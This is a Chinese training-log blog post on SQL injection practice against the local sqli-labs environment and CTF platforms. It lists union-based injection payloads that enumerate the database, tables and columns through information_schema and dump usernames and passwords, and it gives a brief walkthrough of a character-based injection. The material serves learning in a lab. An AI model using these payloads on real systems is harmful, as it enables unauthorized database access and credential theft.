实训2 day

最新推荐文章于 2026-01-08 17:10:56 发布
原创 最新推荐文章于 2026-01-08 17:10:56 发布 · 292 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #后端 #网络安全 #web安全

今天主要内容为sql注入,开始时比较抽象,不过做了点题后就明白了很多

题目从http://127.0.0.1/sqli-labs/开始

 今天做了前面四个题    从id=1开始

总结  大体语句如下

id=1

id=1 order by 1~3

?id=-1 union select 1,database()

?id=-1 union select 1,group_concat(table_name) frominformation_schema.tables where table_schema='security' %23

?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' %23

?id=-1 union select 1,group_concat(username,"~",password) from security.users %23

随后做了 BUUCTF在线评测 上的题

 最后做了 CTFhub 技能树上的两道注入题

 字符型注入题解如下:

右键打开检查中的HackBar

用order by 语句逐步测试字段数,例如id=1' order by 2 --+( 注释符)正常返回,但将2改为3时出现报错,说明当前表有2个字段,如下

爆数据库名

爆表名

爆列名

爆字段内容(flag),答案就显而易见了~

书Plan
关注
网络安全实训day2
m0_68572425的博客
08-28 1636
本地电脑会检查浏览器缓存中有没有这个域名对应的解析过的IP地址,如果缓存中有,这个解析过程就结束。这个缓存时间太长和太短都不太好,如果时间太长,一旦域名被解析到的IP有变化,会导致被客户端缓存的域名无法解析到变化后的IP地址,以致该域名不能正常解析,这段时间内有一部分用户无法访问网站。接受请求的顶级DNS服务器查找并返回此域名对应的Name Server域名服务器的地址,这个Name Server服务器就是我要访问的网站域名提供商的服务器,其实该域名的解析任务就是由域名提供商的服务器来完成。
网络安全实训Day1
Yisitelz的博客
03-11 1244
网络安全实训笔记,day1
实训报告Day2
m0_74927289的博客
04-23 798
信息安全专业实训Day2
实训日志day2
zq1121mio的博客
08-28 1077
5、dirmap目录探测工具实践(使用昨日搭建的pikachu靶场),要求讲述为什么dirmap每次扫描条数不一样,加分项:dirmap高级应用,详细见项目文档,项目链接:https://github.com/H4ckForJob/dirmap。例如,使用nslookup或dig工具查看相关域名的DNS记录,尤其是子域名或其他相关记录,可能会找到暴露真实IP的记录。根DNS服务器不会直接提供域名的IP地址,但会返回一个指向顶级域(TLD)DNS服务器的地址,例如.com或.org。
实训Day2
qq_65546115的博客
08-28 1807
当用户在浏览器中输入一个域名时,浏览器会首先检查自己的缓存中是否已经存在该域名的解析记录。如果缓存中有,则直接使用缓存中的IP地址进行访问,解析过程结束。如果浏览器缓存中没有找到对应的解析记录,浏览器会进一步查询操作系统的缓存(如Windows系统中的C:\Windows\System32\drivers\etc\hosts文件,Linux系统中的/etc/hosts文件)。这些文件允许用户手动设置域名与IP地址的映射关系。
python实训内容_python实训day2
weixin_39759107的博客
11-25 567
今天是python实训的第二天,在第一天的基础上,老师教了一些基础简单的操作,回去之后我也自己大量练习了,并做了作业1.作业:实现一个登陆程序代码如下with open(r'file1.text','w',encoding='utf-8') as f:3 f.write('用户名:lzh,密码:108595.\n用户名:lzh,密码:1998.')45 def login():6 ...
实训day2
m0_63785972的博客
08-29 2150
顶级DNS服务器收到请求后,不会直接返回域名和IP地址的对应关系,而是告诉本地DNS服务器,返回NameServer服务器的地址,该域名可以在对应的域名服务器上进行解析获取IP地址。NameServer服务器服务器收到请求后,在自己的缓存表中查找该域名和IP地址的对应关系,并将正确的DNS解析结果,也就是IP地址,返回给本地DNS服务器。根服务器经过查询,如果没有查询到该域名及IP地址的对应关系,就会告诉本地DNS服务器可以到顶级DNS服务器上继续查询,并返回顶级DNS服务器的地址。
实训日志 day1
qq_69302412的博客
08-27 1099
靶场准备与弱口令漏洞
实训作业day05
weixin_68287529的博客
09-01 1048
在url添加“and updatexml(1,(select substr(group_concat(username,0x7e,password)),1,32) from users),1) --+”查找username和password的内容。id=1”)–+”正常说明是字符型注入且闭合方式是**“)**。id=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+ ”查看数据库。id=1’ --+”都报错说明是数字型注入。
实训作业day2
2201_75308782的博客
01-23 501
实训代码及运行截图。
day2实训
m0_74843120的博客
05-30 196
过滤http,追踪post的http流。wireshark打开。
信息安全专业实训#day4
04-25
信息安全专业实训#day4
燕山大学2016级燕软实训Day2资料整理
07-16
总结来说,"燕山大学2016级燕软实训Day2资料"可能涵盖了JavaWeb基础,如Servlet、JSP、JavaBean的使用,以及MVC模式的理解,可能还涉及了数据库操作、服务器配置等内容,这些都是构建JavaWeb应用程序的关键知识点。...
怎么优化慢SQL
chenxuefeng_accp的专栏
01-06 651
摘要:本文系统介绍了MySQL慢SQL优化方法论,涵盖慢SQL定位、常见问题分析及优化策略。通过开启慢查询日志和使用EXPLAIN分析执行计划,可快速识别性能瓶颈。优化措施包括:合理设计索引(避免失效)、解决排序和临时表问题、优化JOIN查询、处理大分页性能问题等。高级优化手段涉及SQL重写、读写分离、分库分表和缓存技术。这些方法不仅适用于InnoDB引擎,部分也适用于其他关系型数据库,是提升数据库性能的实用指南。
AI应用(5)- RAG知识库理解
小糖豆
01-07 724
知识库其实是自己建立的库,并不是让模型记住,而是把文档变成可以检索的库,模型在这个过程中只是读证据,综合多端证据,按照规则输出而已。
使用TwinCAT为半导体设备设计数据功能的技术方案
ponygame的博客
01-05 1481
摘要:本文提出基于TwinCAT平台的半导体设备数据统计系统方案,采用分层架构实现实时数据采集与处理。实时层(PLC)负责1-10ms级数据采集、预处理和基础统计计算,符合SEMI标准要求;非实时层(.NET)实现数据分析、存储和WPF/WinForms界面展示。系统通过ADS协议实现高效通信,支持EtherCAT等现场总线接入,提供实时监控、历史趋势、统计报表等功能。方案涉及TwinCAT编程、C#开发、数据库设计等多技术领域,具有实时性强、模块化程度高、符合行业标准等特点,但需掌握IEC61131-3、
TDengine JAVA 语言连接器入门指南
TDengine(老段)专注时序数据库领域
01-04 1714
JAVA 语言连接器
数据库技术基础-01-数据库的基本概念
入选天府英才计划,致力于大数据+AI 的应用创新。
01-05 513
本文介绍了数据库技术的基本概念,包括数据、数据库数据库管理系统和数据库系统。数据是数据库中存储的基本对象,可以是数字、文字、图像等多种形式。数据库是有组织、可共享的数据集合,具有低冗余、高独立性和易扩展性特点。文中通过学生记录等实例说明了数据语义的重要性,并简要提及数据库安装和数据表创建等实践内容。
【Spring Boot】 接口性能优化“十板斧”:从数据库连接到 JVM 调优的全链路提升
最新发布
夜雨的博客
01-08 384
【Spring Boot】 接口性能优化“十板斧”:从数据库连接到 JVM 调优的全链路提升。Spring Boot 接口性能优化是一个系统工程,而非单点的技术修补。上述“十板斧”涵盖了从数据库交互、应用架构设计、代码逻辑实现到底层运行时环境的全方位策略。
引航计划Day1:Arduino无人驾驶实训入门
“引航计划Day1实训记录[源码]”所呈现的内容,是人工智能与嵌入式系统交叉领域中一项极具代表性的实践教学案例。该实训项目由山东大学联合百度飞桨等权威机构共同发起,旨在通过系统化的工程实践训练,培养具备实际...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值